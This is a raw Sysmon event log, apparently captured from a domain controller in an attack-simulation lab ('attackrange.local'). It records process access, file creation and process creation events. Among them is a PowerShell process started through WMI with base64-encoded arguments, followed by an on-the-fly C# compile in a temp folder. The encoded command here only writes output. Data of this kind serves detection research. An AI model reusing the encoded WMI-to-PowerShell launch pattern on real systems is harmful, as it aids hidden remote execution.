22:55:49.990{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F5-603D-8A88-00000000AD01}7836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70F5-603D-8A88-00000000AD01}78364848C:\Windows\system32\conhost.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-70F5-603D-8A88-00000000AD01}7836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001698137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001698136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001698131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000001698130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.974{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EncodedArguments PABPAGIAagBzACAAVgBlAHIAcwBpAG8AbgA9ACIAMQAuADEALgAwAC4AMQAiACAAeABtAGwAbgBzAD0AIgBoAHQAdABwADoALwAvAHMAYwBoAGUAbQBhAHMALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AcABvAHcAZQByAHMAaABlAGwAbAAvADIAMAAwADQALwAwADQAIgA+AA0ACgAgACAAPABPAGIAagAgAFIAZQBmAEkAZAA9ACIAMAAiAD4ADQAKACAAIAAgACAAPABUAE4AIABSAGUAZgBJAGQAPQAiADAAIgA+AA0ACgAgACAAIAAgACAAIAA8AFQAPgBTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEEAcgByAGEAeQBMAGkAcwB0ADwALwBUAD4ADQAKACAAIAAgACAAIAAgADwAVAA+AFMAeQBzAHQAZQBtAC4ATwBiAGoAZQBjAHQAPAAvAFQAPgANAAoAIAAgACAAIAA8AC8AVABOAD4ADQAKACAAIAAgACAAPABMAFMAVAA+AA0ACgAgACAAIAAgACAAIAA8AFMAPgAzADAANABhADYAMQBmADIALQBkAGEAMABjAC0ANAA4ADcANQAtADgAMwAwADMALQA4ADgAYwA2ADEANwA0ADYANQAzADEAZAA8AC8AUwA+AA0ACgAgACAAIAAgADwALwBMAFMAVAA+AA0ACgAgACAAPAAvAE8AYgBqAD4ADQAKADwALwBPAGIAagBzAD4A -E VwByAGkAdABlAC0ASABvAHMAdAAgACQAYQByAGcAcwBbADAAXQA=C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe 23542300x80000000000000001698129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.958{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F26893DE7490CC9105288879C6AE75DD,SHA256=D66C6E19C38785C20922C5A3917D107B91ABB8E8924E9AC09DA8BC5C06C5E4E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.865{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\tmpF70.tmpMD5=89316B01E7BC61610C45589C2F6FFC55,SHA256=0E4B8D8E1E1A250C61BB180FC618BA9D2159A8D1E427673ADB3F7EA1BC9E0185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.849{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\tmpF70.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.755{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BB8774091A322A557601F70C7C999104,SHA256=E1F819BE4C8C49E32776A374F0E8D13969C7DC463BD3055EE90C1BFB0CCF68AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.740{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0E8845FCB6F031B695BF67811B7DBDE2,SHA256=C0E72BD3E45E2A97EB04ACB7C75FC381DC4FAB24B90788A8936A85F80B45A95B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.693{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4FB0EDCCF2D933EDB824DDE8F1EFB76D,SHA256=D902809E78E9196FA094BD8EE69B3D79671E8CDF31EECEE8460EA7629C6DF416,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.693{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B8CCBEE77FC5B1C574FB8B0E973182A,SHA256=6B510C2FA3FF0B3E72F210B5387C21F4B92E00D43363539006335D3650E89D7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.677{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.cmdlineMD5=8218A14530D2AA0E3BB9EB30CCB6F5E8,SHA256=AC665AF0B56901CC065307368FD2018A575CD0B2FCF632196D44D240199B2FBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.677{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.outMD5=AEFB8C45FCDB097D7BEA72E6B3523DC6,SHA256=C0041CA6D5DF6101288D5B25F97F70DE509277142967516F153CE4592C4E87B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.661{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.dllMD5=B63A431A4C852FA7C3720258DA48A1F7,SHA256=33FB5D9B3A8576E26A00C78D032B9D3925EA3EC526B732A5A86C6134831B9C64,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000001698119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.661{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.0.csMD5=FB718D19F4C91D265609078FD8B12F5B,SHA256=C8612E37CBE1FB289864974C65AE8679D1AD656EAF43D265D3F277D28679692D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.661{05ADC7E1-70F5-603D-8788-00000000AD01}9004ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\CSCF70D6421C7C4452682E1F3C889B29C6B.TMPMD5=A7E9B8D51966AB320DD9F8FFFCF1C9F9,SHA256=164AB7D82B6CC74AC7E82AAF186611F11709B2B1F6B8A4C24281E39E64D92D83,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001698117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:55:49.661{05ADC7E1-70F5-603D-8788-00000000AD01}9004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.dll2021-03-01 22:55:49.568 23542300x80000000000000001698116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.661{05ADC7E1-70F5-603D-8788-00000000AD01}9004ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.661{05ADC7E1-70F5-603D-8788-00000000AD01}9004ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RESEA5.tmpMD5=95AD5EA680CC03F6B8C5E678B8D54068,SHA256=57A68070496E94D8221CA7CA85B0108701346C6B5C5D12EAD64E0C68680B75B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.646{05ADC7E1-70F5-603D-8888-00000000AD01}8572ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RESEA5.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.646{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F5-603D-8888-00000000AD01}8572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.646{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-70F5-603D-8888-00000000AD01}8572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001698108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.646{05ADC7E1-70F5-603D-8788-00000000AD01}90046664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{05ADC7E1-70F5-603D-8888-00000000AD01}8572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001698106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.647{05ADC7E1-70F5-603D-8888-00000000AD01}8572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RESEA5.tmp" 